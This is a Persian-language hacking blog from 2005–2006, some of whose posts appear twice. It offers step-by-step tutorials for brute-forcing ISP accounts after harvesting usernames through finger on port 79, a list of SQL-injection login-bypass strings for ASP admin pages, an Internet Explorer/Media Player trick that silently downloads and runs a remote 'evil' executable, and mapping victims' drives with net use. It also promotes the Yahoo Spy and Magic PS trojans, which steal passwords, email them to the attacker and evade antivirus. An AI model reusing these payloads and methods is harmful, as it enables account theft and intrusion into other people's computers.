محمد هکر

هک اکانت از ای. اس. پی

هک اکانت از آی اس پی هایی که با asp.netطراحي شدن

کي از آموزش هاي هک Acount از اي اس پي

اين طريقه ي هک از راه Brute Force مي باشد
براي اين کار بايد در مرحله اول از وجود يک User name باخبر باشيد يعني بدونيد کي رو مي خواهيد هک کنيد... به همين جهت اگر از قبلUser name رو مي شناسيد شروع به هک مي کنيد اگر که نه مراحل زير رو انجام ميديد.
دراينجا بايد در ابتدا طرز اتباط با پورت 79 را اموزس بدم....

ابتدا دکمه ي start سپس گزينه ي Run را انتخاب کرده و در داخل ان cmd مي نويسيد.

همان طور كه ميدونيد براي صحبت با پورتها از دو برنامه
telnet
nc
استفاده ميشود حالا فرض كنيد ميخواهيم با پورت 79 به كامپيوتري به اسم
ironline.ir
ارتباط برقرار كنيم ميتوانيم از 3 دستور زير استفاده كنيم
telnet ironline.ir 79
nc -v ironline.ir 79
finger .@ironline.ir
همان طور كه ميبينيد در دو دستور اول شماره پورت نوشته شده ولي در سومي نه چون فينگر مخصوص پورت 79 هستو نميتواند با پورت ديگه اي ارتباط برقرار كند خلاصه بعد از ايجاد ارتباط جواب ميشنويد

Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address

اين اطلا عات نشاندهنده اكونتهايي هست كه هماكنون انلاين هستن كه شما ميتونيد فقط يوزهاي اكونتها موجود ببينيد البته اين اطلاعات بستگي به نوع سرور داره بعضي از سرورا نام و نام خوانوادگي افراد را هم ميدن.

خوب بعد از اينکه User Name طرف را پيدا کرديد برنامه ي Unsecurev1.2 رو از داون لود مي کنيد براي اين کار بروي اينجا کليک نماييد.وقتي فايلو گرفتيد چندين قسمت ميبينيد كه من يكي يكي اونارو توضيح ميدم در قسمت
computer name or ip
آي پي و يا سايت اون آي سي پي كه مي خوايد ازش اكونت دودر كنيد و بنويسيد
مثل البرز كه من چنتا اكونت تونستم ازش بدست
بيارم در قسمت پورت هم 21 رو مينويسيد كه
البته از پورت 79 هم ميتونيد استفاده كنيد البته اگه باز بود در قسمت
curent password
كاري نداشته باشيد كه محل پسورد كشف شده است در قيمت يوزرنيم شما بايد يه
يوزر حدس بزنيد كه كار زياد سختي نيست چون تمام اي سي پي ها از يه رنج
خاصي استفاده ميكند مثلا شركت ايكس تمام يوزراشو به اين صورت
tech1234a
tech3424a
tech3255a
tech3333a
tech2341a
است كه اينجا بستگي به مهارت هكري خودتون داره در قسمت
dictionary file
هم ادرس يه پس ليست از كامپيوترتون ميديد كه اين پسوردها رو هم بايد
خودتون درست كنيد با فايل ديكشنري ميكر كه
در انتخاب پسوردها هم بايد طبق رنج اي سي پي عمل كنيد
مثلا شركت ايكس تمام پسورداش به اين صورت است
m3244m
m3456m
m7565m
m6533m
m3245m
پس همونطور كه ميبينيد به اين راحتي نيست كه يه دكمه رو فشار بديدو
فايل يه اكونت بزار كف دستتون بايد شم هكرتونو به كار بندازيد
خوب در قسمت
attack option
هر 4 گزينه رو كليك كنيد در قسمت
brute furce option
مشخص ميكنيد كه فايل چطوري دنبال پسورد بگرده مثلا حرف اول اون با عدد يا حرف شروع ميشه يا تعداد حروف پسوردچندتاس و غيره در پايان هم كانكتو ميزنيم و منتظر ميشيم تا فايل پسوردو پيدا كنه
اين برنامه با نام Fireisphacker2 در قسمت تروجانها قرار دارد

+ نوشته شده در شنبه دوم اردیبهشت 1385ساعت 20:29 توسط محمد هکر |

هک اکانت از آی اس پی هایی که با asp.netطراحي شدن

کي از آموزش هاي هک Acount از اي اس پي

اين طريقه ي هک از راه Brute Force مي باشد
براي اين کار بايد در مرحله اول از وجود يک User name باخبر باشيد يعني بدونيد کي رو مي خواهيد هک کنيد... به همين جهت اگر از قبلUser name رو مي شناسيد شروع به هک مي کنيد اگر که نه مراحل زير رو انجام ميديد.
دراينجا بايد در ابتدا طرز اتباط با پورت 79 را اموزس بدم....

ابتدا دکمه ي start سپس گزينه ي Run را انتخاب کرده و در داخل ان cmd مي نويسيد.

همان طور كه ميدونيد براي صحبت با پورتها از دو برنامه
telnet
nc
استفاده ميشود حالا فرض كنيد ميخواهيم با پورت 79 به كامپيوتري به اسم
ironline.ir
ارتباط برقرار كنيم ميتوانيم از 3 دستور زير استفاده كنيم
telnet ironline.ir 79
nc -v ironline.ir 79
finger .@ironline.ir
همان طور كه ميبينيد در دو دستور اول شماره پورت نوشته شده ولي در سومي نه چون فينگر مخصوص پورت 79 هستو نميتواند با پورت ديگه اي ارتباط برقرار كند خلاصه بعد از ايجاد ارتباط جواب ميشنويد

Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address

اين اطلا عات نشاندهنده اكونتهايي هست كه هماكنون انلاين هستن كه شما ميتونيد فقط يوزهاي اكونتها موجود ببينيد البته اين اطلاعات بستگي به نوع سرور داره بعضي از سرورا نام و نام خوانوادگي افراد را هم ميدن.

خوب بعد از اينکه User Name طرف را پيدا کرديد برنامه ي Unsecurev1.2 رو از داون لود مي کنيد براي اين کار بروي اينجا کليک نماييد.وقتي فايلو گرفتيد چندين قسمت ميبينيد كه من يكي يكي اونارو توضيح ميدم در قسمت
computer name or ip
آي پي و يا سايت اون آي سي پي كه مي خوايد ازش اكونت دودر كنيد و بنويسيد
مثل البرز كه من چنتا اكونت تونستم ازش بدست
بيارم در قسمت پورت هم 21 رو مينويسيد كه
البته از پورت 79 هم ميتونيد استفاده كنيد البته اگه باز بود در قسمت
curent password
كاري نداشته باشيد كه محل پسورد كشف شده است در قيمت يوزرنيم شما بايد يه
يوزر حدس بزنيد كه كار زياد سختي نيست چون تمام اي سي پي ها از يه رنج
خاصي استفاده ميكند مثلا شركت ايكس تمام يوزراشو به اين صورت
tech1234a
tech3424a
tech3255a
tech3333a
tech2341a
است كه اينجا بستگي به مهارت هكري خودتون داره در قسمت
dictionary file
هم ادرس يه پس ليست از كامپيوترتون ميديد كه اين پسوردها رو هم بايد
خودتون درست كنيد با فايل ديكشنري ميكر كه
در انتخاب پسوردها هم بايد طبق رنج اي سي پي عمل كنيد
مثلا شركت ايكس تمام پسورداش به اين صورت است
m3244m
m3456m
m7565m
m6533m
m3245m
پس همونطور كه ميبينيد به اين راحتي نيست كه يه دكمه رو فشار بديدو
فايل يه اكونت بزار كف دستتون بايد شم هكرتونو به كار بندازيد
خوب در قسمت
attack option
هر 4 گزينه رو كليك كنيد در قسمت
brute furce option
مشخص ميكنيد كه فايل چطوري دنبال پسورد بگرده مثلا حرف اول اون با عدد يا حرف شروع ميشه يا تعداد حروف پسوردچندتاس و غيره در پايان هم كانكتو ميزنيم و منتظر ميشيم تا فايل پسوردو پيدا كنه
اين برنامه با نام Fireisphacker2 در قسمت تروجانها قرار دارد

+ نوشته شده در چهارشنبه بیست و نهم تیر 1384ساعت 15:29 توسط محمد هکر |

هک کردن سایتها با پی اچ پی نوک

خوب از php که بگذريم ميرسيم به پورتالهاي قويتر و بهتر به نام asp که گفتم که asp هم يک زبان برنامه نويسي تحت وب هستش که تنها مشکلي هم که داره تو قسمت ورود به کنترل پنلش هستش که با يک پسوورد ميشه وارد اون شد که اين اشکال به اين دليل که کسي که سايت رو طراحي کرده اين اشکالات : ( ) , ( , = . " . ' ‌) رو فيلتر نکرده و شما ميتونيد با يک پسوورد که اين علامات در اون به کار رفته سايت رو اينجکت کنيد که injection در زبان انگليسي به معني تزريق کردن ميباشد خوب حالا من طرض استفاده اين کار رو بهتون ميگم ابتدا تو گوگل يا ... سرچ کنيد :

inurl:login.asp

inurl:admin.asp

خوب ميتونيد يک کلمه فارسي يا عربي مثل في يا فارسي يا ... جلوي اينها بنويسيد خوب بالاخره تو کار هک بايد از خودتون هم يخورده ابتکار عمل نشون بديد خوب حالا اون پسووردها هم اينها هستند :

' or ''=' admin" or "a"="a admin" or 1=1 -- admin' or 1=1 -- admin' or 'a'='a admin') or ('a'='a admin") or ("a"="a a=1)-- admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a </body> </html>

+ نوشته شده در چهارشنبه بیست و نهم تیر 1384ساعت 15:7 توسط محمد هکر |

فرستادن و اجرای مخفی یک فایل اجرایی در کامپيوتر

با روشي كه توضيخ خواهم داد شما مي توانيد از طريق يك سايت فايلي را در كامپيوتر هدف خود دانلود و سپس اجرا كنيد! راه نفوذ اين روش از طريق سر ريز شدن اينترنت اكسپلورر 6 و مديا پلير هست.

1. يك فايل با پسوند HTML تشكيل دهيد و كد زير را در آن قرار دهيد:

Wait a couple of seconds..

بجاي قسمت http://YourHost.com/YourEvilFile.exe آدرس فايلي را بنويسيد كه مي خواهيد در كامپيوتر هدف اجرا شود.

اگر هدف شما مديا پلير را در شاخه يا داريوي غير از C:Program FilesWindows Media Playerwmplayer.exe نصب كرده است اين قسمت را نيز تغيير دهيد.

2. يك فايل ديگر با نام error.jsp تشكيل دهيد و داخل آن هر كد html كه مي خواهيد قرار دهيد. چون هدف شما در هنگام دانلود و اجرا شدن فايل صفحه درون فايل error.jsp را مي بيند.

3. حالا فايل html و error.jsp را در يك شاخه روي يك فضا رايگاني كه از يك سرور مثل http://www.angelfire.com گرفته ايد آپ لود كنيد.

4. از فايل اجرايي مديا پلير خود wmplayer.exe يك كپي تهيه كنيد چون احتمال دارد خراب شود

5. وارد صفحه html كه ساخته بوديد از طريق اينترنت اكسپلورر شويد. مثلا http://www.angelfire.com/youaccoundname/index.html

6. فايل بدون هيچ اخطاري دانلود شده و بجاي فايل اجرايي مديا پلير ميشيند و سپس اجرا مي شود

+ نوشته شده در چهارشنبه بیست و نهم تیر 1384ساعت 15:1 توسط محمد هکر |

استفاده راحت از شكلكهاي ياهو Yahoo smily !! و چند مطلب جالب كه ازگشتن داخل سايتها پيدا كردم:

استاستفاده راحت از شكلكهاي ياهو Yahoo smily !!فاده راحت از شكلكهاي ياهو Yahoo smily !!

سلام دوستان ببخشيد که من دارم دير دير اپديت ميکنم چون امتحانام شروع شده و ديگه فرست ندارم و من تا تابستان براتون متلب از وب های ديگه کپی ميکنم.
و اين هم چند مطلب جالب در مورد یاهو:
با استفاده از برنامه زير ميتوانيد به راحتي از شكلكهاي مخفي ياهو استفاده كنيد و نيازي به حفظ كردن هيچ كدي نيست :

دانلود

---------------------------------------

چند مطلب جالب كه ازگشتن داخل سايتها پيدا كردم:

• ie در AutoComplete پاک کردن محتويات

شما می توانيد تمام اطلاعاتی را که در
AutoComplete
ذخيره شده است از قبيل پسوردها ، آدرس سايت ها ، کلمات کليد و
... را حذف کنيد
. برای اين کار کارهاي زير را انجام دهيد :

۱ - ابتدا
IE
را اجرا کنيد .
۲ - به قسمت های زير برويد :
Tools / Internet Options / Content / AutoComplete
۳ - روی دکمه
Clear Forms کليک کنيد
.
۴ - برای پاک کردن پسورها نيز روی دکمه
Clear Passwords کليک کنيد

پيدا كردن ip خودتان :

از طريق گزينه run فرمان winipcfg را اجرا كنيد با اين فرمان پنجرهاي باز ميشود و اطلاعاتي در خصوص ارتباط شما در اينترنت در اختيارتان قرار ميدهد

--------------------------------------------------------------------------------------------------------------

نترسید و راحتر چت کنید

نترسید و راحتر چت کنید ! ( کدهایی که شمارو بوت می کنن فیلتر کنید(این و با کلی کلنجار رفتن فهمیدم و دیگه با این کار بوت نمی شید حتی اگه بهترین بوترها رو هم داشته باشن ! ولی اگه خودشون بخوان با چندتا مولتی پروگرام بوتتون کنن بوت نمی شید فقط یاهو مسنجرتون یه بار از اول لاگین میشه ! خوب برای این کار به شاخه
C:\Program Files\Yahoo!\Messenger\filter1.txt
بروید و فایل filter1.txt را باز کنید و در خط کدهای زیر وارد کنید که در بعضی سیستم ها باید با یک , و یک فاصله بعد از این کارکتر این کار رو بکنید ! با این کار شما بوتر هارو غیر فعال می کنید

------------------------------------------------------------------------------------------------------------

نسخه های 1.4و1.41و1.42 را غیر فعال کرد magic ps با این برنامه شما میتوانید ترجان

دانلود دانلود اندازه 148KB

برنامه برای کرک کردن برنامه یاهو ((وارد شدن به تعداد دلخواه یاهو)) دانلود

برای هک نشدن و بوت نشدن درباهوو وارد شدن با id های بزرگ در اتاق های یاهو دانلود

----------------------------------------------------------------------------------------------------------

امروز من میخواهم به شما یاد بدم که چه جوری وارد id کسی شد که قبلا با یا هو مسنجر ان سیستم کار کرده

اول باید درstart وارد پنجره run شوید و دستورregedit تایپ کرده و سپس ok را فشار داده و یک پنجره برای شما می اید و گزینهCurrent-User Hkey- را انتخاب کرده و سپس میروید سر گزینه software و در آن گزینه ای به نام yahoo و جود دارد روی ان کلیک کنید و سپس روی گزینه

pager کلیک کنید و در پنجره جلو چند تا گزینه وجود دارد که شما باید بر روی پنجره save password کلیک کنید و در پنجره value data عدد

10 را می نویسید و سپس وارد مسنجر شوید و login کنید و این کار بیشتر در کافینت ها کاربرد داره

------------------------------------------------------------------------------------------------------------

1:در مورد hack و hacker

در فر هنگ اصطلاحات کامپیوتری ماکرو سافت به دو صوزت معنا شده است:

:1تغییرات دستورات یک برنامه اغلب بدون صرف زمان کافی برای پیدا کردن یک راه حل ظریف

:2استفاده از قوه خلاقیت از یک مسئله یا پروژه برنامه سازی یا تغییر رفتار یک بر نامه کاربردی یا یک سیستم عامل از طریق تغییر دستورات و نه اجرای برنامه وانتخاب گزینه ها

دو تعریف بالا تا هدودی به این مسئله اشاره دارند که هک کردن کاری است که به قوه خلا قیت انسان بستگی دارد و همیشه با ارائه کارهای جدید و ا ا بتکاری همراه است .

نا گفته نماند که علم هک اصولا برای آزار دیگران و ایجاد خسارت نیست و این معنی نادرست به اشتباه بین مردم رایج است .

:2 isp

internet service provider

به معنی تامین کننده خدمات اینترنتی است اداره یا شرکتی که خدمات اتصال به اینتر نت را برای اشخاص ادارات و ساز مان های دیگر فراهم میکند و برخی از isp ها شرکت های بزرک وملی ویا چند ملیتی هستند .

:3 ip adress

چون تقریبا تمام روش های هک با ip adress سر و کار دارند باید بتوانید ip سایت ها ویا اشخاص مورد نظر را پیدا کنید .

برای پیدا کردن ip وب سایت ها باید اول وارد محیط dos شده وسپس دستور ping را نوشته و رو به روی ان ادرس وب سایت مورد نظر را

نوشته بعد از اینتر کردن شماره ip مورد نظر را یاداشت می کند .

برای پیدا کر دن شمارهip خودتان وارد محیط dos شده و دستور ip confing را تایپ کنید و یا برای بهتر انجام شدن کار " برنامه my ip finder را از سایت دیگر دانلود کنید و برای پیدا کردن ip افراد مورد نظر کافیست برنامه black ice یا هر برنامه ip finder را بر روی کامپیوتر خود نصب کنید با این کار اگر هر گونه packet از طرف شخص مورد نظر برای شما ارسال شود یا ازسوی شما یک packet شامل فایلها یا پیغامی برای اوفرستاده شود برنامه ip finder شماره ip اورا به شما می دهد .

توجه:

برای پیدا کردن ip افراد بدون داشتن نرم افزار به خصوص می بایست به پروتکل TCP/IPوFTP تسلط کافی داشت که این امر

نیازمند مطالعه فراوان درمورد این دو دارد

که من بعدا گرفتن ip بدون برنامه را به شما آموزش می دهم

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 9:54 توسط محمد هکر |

شکل ياهوی خود را عوض کنيد

۱.برين به ياهو مسنجرتون و اين کارهايی که می گم رو پله به پله انجام بدين برين توی loginبعد برين توی pereferences بعد برين توی appearance بعد يک تکست به نام current theme می بينيد که جلوش گزينه هايی است که قابل تغيير است آن را روی حالت custom قرار داده وok را بزنيد....

اين هم از اين از اين به بعد منتظر اسکينهايی که خودم می سازم باشيد فعلن خداحافظ

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 3:42 توسط محمد هکر |

اموزش هک

طريقه عبور از قفل ويندوزxp

خوب ما الان پشت قفل ويندوزxpگير کرديم اول بايد الت+کنترل+دليت رو چند بار بگيريم تا يک صفحه باز

شه که يوزرنيم و پسورد مي خواد شما تو يوزرنيم بنويسيد Administration يا Administrator بعداينتر کنيد

تموم شد!!يک نکته مهم اينه که اگه اسم سيستم Administrator باشه نمي شه

-----------------------------------------------------------------محمد هکر ---------------

قبل از سلام اگه در مورد هک سايت چيزی نميدونی اينو نخون!
سلام
برای هک کردن يه سايت به ترتيب از راه داس به شرحه زير است:
۱.بعد از انصال به شبکه٬ميری تو داس و به شکل زير عمل ميکنی:
C:\>telnet http://www.domail-name.com/ 79
بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد ميشويد و گرنه نميشه
۲.اگر پورت باز بود و شما وارد شديد مشغول خراب کاريتون بشين اونش ديگه به من ربطی نداره می خوای چه بلايی سر سايت بياری.
**نکته**:
۱.اگر در هنگام خراب کاری متوجه شدين سرعت سيستمتون خيلی کم شد سری خارج شو.
۲.اگه از ترس اينکه پيدات کنن٬بعد از خراب کاريت فورا ريست نکن.اول ديسکانکت بعد ریست.
۳.همون طور که اول گفتم اگه چيزی از هک سايت و فرمانهای داس نميدونی اصلا بهت توصيه نميکنم اين کارو بکنی.
۳.اينکه من هيچ مسئوليتی ندارم

-------------------------------------------------------------------------------

با استفاده از ip کاری کنیم فرد قربانی خیلی راحت در کنار سیستم خود سکته کند!!

اول ip فرد رو گیر بیارید( مثلا بهش وب بده ) بعد از این که ip رو گیر آوردید

توی ران بنویسید cmd .بعد یک صفحه cmd باز میشه که شما باید

توش بنویسید netstat اینتر کنید بعد بنویسید netstat -n بعدش

شما میتونین ipفردی که بهش وب دادید رو در اینجا گیر بیاورید

وقتی ip رو گیر آوردید

این دستور رو در cmd بنویسید

net send ip peyghamاین دستو در صورتی کار میکنه که سیستم فرد در حالت ادمینیستوری باشد

اگه سیستم فرد در حالت ادمینیستوری نبود باید اسم سیستم فرد رو بلد باشید که در این صورت

باید این دستور رو بنویسی (مثلا سلام اسم سیستم فرد قربانی net send ip)در صورتی که از این دو

دستور استفاده کنید چیزی به شکل یک eror در صفحه سیستم فرد باز میشه که نوشته (مثلا سلام)

--------------------------------------------------------------------------------------------

ورود به سیستم شخس و به اشتراک گذاشتن دراو های سیستم فرد بدون برنامه

ورود به سیستم شخس

اول باید ipرو گیر بیاریم که ما در اینجا می خوایم بدون برنامه این کارو بکنیم خیلی سادس به فرد

وب بدهید تا شما رو ببینه تموم شد ip فرد لو رفت و هالا اگر شرایت فراهم باشه شما میتوانید وارد

سیستم فرد شوید ۱ شما نباید آنتی ویروس داشته باشید فرد قربانی هم همین تور۲ یا باید اسم

سیستم قربانی رو بلد باشید یا باید سیستم فرد در حالت ادمینیستوری باشد تموم شد شما

میتوانید وارد سیستم فرد شده و هر کاری دوست دارید با کمک این آموزش زیر انجام دهید

بعد از این که این شرایت را فراهم کرید

اول باید داخل Run بنویسید cmdشکل زیر

دوم یک صفحه cmd باز میشه که شما باید توش بنویسید netstat اینتر کنید و بعد بنویسید netstat -n و دوباره اینتر کنید شکل زیر

سوم شما ip کسی که بهش وب دادید رو در این جا میبینید + IP های دیگر که ما با اونها کاری نداریم

حالا این دستور رو بنویسید

$net use x: \\ip\ c شما بجای c می توانید اسم دراوی که میخواهید با فرد به اشترک بگذارید بنویسید

خوب حالا اینتر کنید

چهارم خوب شما جمله The command completedرو می بینید که نشون میده ما به سیستم قربانی

متصل شدیم

خوب حالا برید و یک نگاهی به My Computer خود بندازید درایو فرد قربانی در اینجا مشاهده میشه

--------------------------------------------------------------------------------------------

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 2:49 توسط محمد هکر |

محمد هکر

YAHOO SPAY

بالاخره نسخه کامل برنامه Yahoo Spy آماده شد و مشکلاتی که در نسخه آزمایشیه آن وجود داشت بر طرف شد. در نسخه قبلی مشکل کوچیکی وجود داشت و پسوردها به ایمیل ارسال نمیشد ولی در این نسخه تمامی مشکلاتش حل شده و اگر یادتون باشه گفته بودم که برنامه قادره رمز ذخیره شده در یاهو مسنجر را برای شما بصورت کد ارسال کنه و روشی را برای دیکد کردنش گفتم اما آقا مهرداد زحمت کشیدند و در این نسخه یه برنامه دیکدر هم براتون ساختند که کافیه آیدی و کدی که به ایمیلتان ارسال میشه را به برنامه بدید و روی کلید start کلیک کنید تا برنامه کد را برای شما به رمز اصلی بتدیل نماید و به شما نمایش دهد. همچنین قابلیت اضافه کردن آیکون و تغییر نام فایل ساخته شده و افزودن و کم کردن قابلیتهای فایل ساخته شده هم به برنامه اضافه شده و البته همونطور که در عکس برنامه و در خود برنامه میبینید ۴ قابلیت برنامه غیر فعاله و در نسخه های بعدی آماده میشه . پس اگر میخواهید قدرتمندترین تروجان را در اختیار داشته باشید هر چه سریعتر دانلود کنید.

توجه۱ : چنانچه از یاهو مسنجر نسخه ۵ استفاده میکنید هنگام Decode کردن رمز احتمال داره که مسنجر شما بطور اتوماتیک با آیدی فردی که هک شده لوگین بشه . شما در این لحظه باید بدون اینکه پنجره برنامه Decoder را ببندید ٬ مسنجر را Logout نمایید و پس از Logout کردن مسنجر ٬ برنامه Decoder رمز عبور آیدی مورد نظر را به شما نشان میدهد.
توجه۲ : در این نسخه ٬ برنامه رمز اشتراک اینترنت را نیز ارسال میکند ولی رمزهایی کسانی را میفرسته که از طریق internet explorer به اینترنت وصل میشوند و رمزهای کسانی که از کاننکشن ویندوز به اینترنت وصل میشودن را نمیفرسته ولی در نسخه بعدی قابلیت ارسال تمامی رمزهای اشتراک اینترنت هم اضافه میشه .

قابلیتها :
۱- پنهان بودن در Task manager(اولین تروجان ایرانی با این قابلیت)
۲- پنهان در برنامه هایی که استارت آپ شما را مونیتور میکنند .
۳-قربانی نمیتواند آن را به آسانی از سیستم خود پاک کند.
۴- هیچ ویروس یابی نمیشناسش.
۵- از همه فایروالها رد میشه.
۶- رمزهای بدست آمده را به ایمیل شما ارسال میکند.
۷- رمزهای یاهو مسنجر و Msn , Ftp , رمز Dialup را برای شما میفرسته.
۸- رمزهای یاد شده را در همان لحظه اجرای برنامه و در کمتر از ۵ ثانیه ارسال میکنه.
۹- به تمام سرورهای ایمیل قادره ایمیل بفرسته .(Yahoo,Hotmail,Msn,Google,...)
۱۰- وقتی قربانی سعی در پاک کردن آن داشته باشه رجیستری قربانی را غیر فعال میکند.
۱۱- روی تمام ویندوزهای ۹۵ به بالا کار میکنه و حتی روی لانگهورن هم کار میکنه.
۱۲- روی تمام نسخه های یاهو مسنجر کار میکنه و حتی توپی های جای پسورد یاهو هم تغییر نمیده و هیچ جای شکی به جا نمیذاره.
۱۳- غیر فعال کردن برخی از برنامه های ویروسیاب
۱۴- توسط پکر جدیدی درست میشه و هیچ ویروسیاب و تروجان یاب و ... نمیتونه پیداش کنه.
۱۵- در کمتر از ۵ ثانیه ایمیل را ارسال میکنه.

دانلود(برای هک کردن پسوردها)

دانلود(برای Decode کردن رمزهای ارسالی)

دانلود(برای چسباندن دلخواه فایل به تروجانی که میسازید)

Yahoo Spy Contain:
1- Hide Of TaskManager.
2- Hide of Startup Monitors.
3- User Can't Delete it Easy.
4- AVS can't Detect it.
5- Firewalls Can't Stop it.
6- Send To Mail Box.
7- Send Yahoo,Msn,FTP,Dial Password.
8- Disable Registry Editor when user try for delete it.
9- Send To All Mail Servers. (Yahoo,Hotmail,Msn,Google,...)
10- Full Supporting win 9x-me-nt-2k-xp-2k3 and LongHorn.
11- Fixed for all Versions of yahoo messenger 5x-6x.
12- Recover Asterisk XP/2000 Password Very Nice without change password icon.
13- Destroy Some Monitors Software
14- Pack With New Packer and AVS can't Detect it.
15- Send Mail Very Fast. (less than 5 second).

-----------------------------------------------------------------------------------------------------------------------------------------

این هم باز یه تروجان دیگه که همه میشناسیدش بله. مجیک پی اس خودمونه! این نسخه این تروجان هم هیچ ویروسیابی نمیشناسه و قابلیت ارسال رمز مسنجر یاهو از طریق پی ام را داره فقط و از تسک منجر هم پنهان نیست ولی باز بد نیست . اگر مشتری این برنامه هستید دانلودش کنید .

دانلود

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 2:42 توسط محمد هکر |

emil و yhoo spay و magic ps

دآنلود دآنلود emil

------------------------------------------------------------------------------------------------------------

این برنامه همونطور که تو عکسش معلومه برای اینه که بتونید باهاش رمزهای از نوع ستاره ای یا رمزهای توپی که در ویندوز ایکس پی هستش رو ببینید و در اصطلاح اونا رو بازیابی کنید.

حجم : 462 کیلوبایت

دانلود

crack

---------------------------------------------YAHOO SPY---------------------------------------------------------------

بالاخره نسخه کامل برنامه Yahoo Spy آماده شد و مشکلاتی که در نسخه آزمایشیه آن وجود داشت بر طرف شد. در نسخه قبلی مشکل کوچیکی وجود داشت و پسوردها به ایمیل ارسال نمیشد ولی در این نسخه تمامی مشکلاتش حل شده و اگر یادتون باشه گفته بودم که برنامه قادره رمز ذخیره شده در یاهو مسنجر را برای شما بصورت کد ارسال کنه و روشی را برای دیکد کردنش گفتم اما آقا مهرداد زحمت کشیدند و در این نسخه یه برنامه دیکدر هم براتون ساختند که کافیه آیدی و کدی که به ایمیلتان ارسال میشه را به برنامه بدید و روی کلید start کلیک کنید تا برنامه کد را برای شما به رمز اصلی بتدیل نماید و به شما نمایش دهد. همچنین قابلیت اضافه کردن آیکون و تغییر نام فایل ساخته شده و افزودن و کم کردن قابلیتهای فایل ساخته شده هم به برنامه اضافه شده و البته همونطور که در عکس برنامه و در خود برنامه میبینید ۴ قابلیت برنامه غیر فعاله و در نسخه های بعدی آماده میشه . پس اگر میخواهید قدرتمندترین تروجان را در اختیار داشته باشید هر چه سریعتر دانلود کنید.

توجه۱ : چنانچه از یاهو مسنجر نسخه ۵ استفاده میکنید هنگام Decode کردن رمز احتمال داره که مسنجر شما بطور اتوماتیک با آیدی فردی که هک شده لوگین بشه . شما در این لحظه باید بدون اینکه پنجره برنامه Decoder را ببندید ٬ مسنجر را Logout نمایید و پس از Logout کردن مسنجر ٬ برنامه Decoder رمز عبور آیدی مورد نظر را به شما نشان میدهد.
توجه۲ : در این نسخه ٬ برنامه رمز اشتراک اینترنت را نیز ارسال میکند ولی رمزهایی کسانی را میفرسته که از طریق internet explorer به اینترنت وصل میشوند و رمزهای کسانی که از کاننکشن ویندوز به اینترنت وصل میشودن را نمیفرسته ولی در نسخه بعدی قابلیت ارسال تمامی رمزهای اشتراک اینترنت هم اضافه میشه .

قابلیتها :
۱- پنهان بودن در Task manager(اولین تروجان ایرانی با این قابلیت)
۲- پنهان در برنامه هایی که استارت آپ شما را مونیتور میکنند .
۳-قربانی نمیتواند آن را به آسانی از سیستم خود پاک کند.
۴- هیچ ویروس یابی نمیشناسش.
۵- از همه فایروالها رد میشه.
۶- رمزهای بدست آمده را به ایمیل شما ارسال میکند.
۷- رمزهای یاهو مسنجر و Msn , Ftp , رمز Dialup را برای شما میفرسته.
۸- رمزهای یاد شده را در همان لحظه اجرای برنامه و در کمتر از ۵ ثانیه ارسال میکنه.
۹- به تمام سرورهای ایمیل قادره ایمیل بفرسته .(Yahoo,Hotmail,Msn,Google,...)
۱۰- وقتی قربانی سعی در پاک کردن آن داشته باشه رجیستری قربانی را غیر فعال میکند.
۱۱- روی تمام ویندوزهای ۹۵ به بالا کار میکنه و حتی روی لانگهورن هم کار میکنه.
۱۲- روی تمام نسخه های یاهو مسنجر کار میکنه و حتی توپی های جای پسورد یاهو هم تغییر نمیده و هیچ جای شکی به جا نمیذاره.
۱۳- غیر فعال کردن برخی از برنامه های ویروسیاب
۱۴- توسط پکر جدیدی درست میشه و هیچ ویروسیاب و تروجان یاب و ... نمیتونه پیداش کنه.
۱۵- در کمتر از ۵ ثانیه ایمیل را ارسال میکنه.

دآنلود(برای هک کردن پسوردها)
دآنلود(برای Decode کردن رمزهای ارسالی)
دآنلود(برای چسباندن دلخواه فایل به تروجانی که میسازید)

Yahoo Spy Contain:
1- Hide Of TaskManager.
2- Hide of Startup Monitors.
3- User Can't Delete it Easy.
4- AVS can't Detect it.
5- Firewalls Can't Stop it.
6- Send To Mail Box.
7- Send Yahoo,Msn,FTP,Dial Password.
8- Disable Registry Editor when user try for delete it.
9- Send To All Mail Servers. (Yahoo,Hotmail,Msn,Google,...)
10- Full Supporting win 9x-me-nt-2k-xp-2k3 and LongHorn.
11- Fixed for all Versions of yahoo messenger 5x-6x.
12- Recover Asterisk XP/2000 Password Very Nice without change password icon.
13- Destroy Some Monitors Software
14- Pack With New Packer and AVS can't Detect it.
15- Send Mail Very Fast. (less than 5 second)

------------------------------------------------------------IP SCANER------------------------------------------------------------------------------------------------------------------------------------------------------

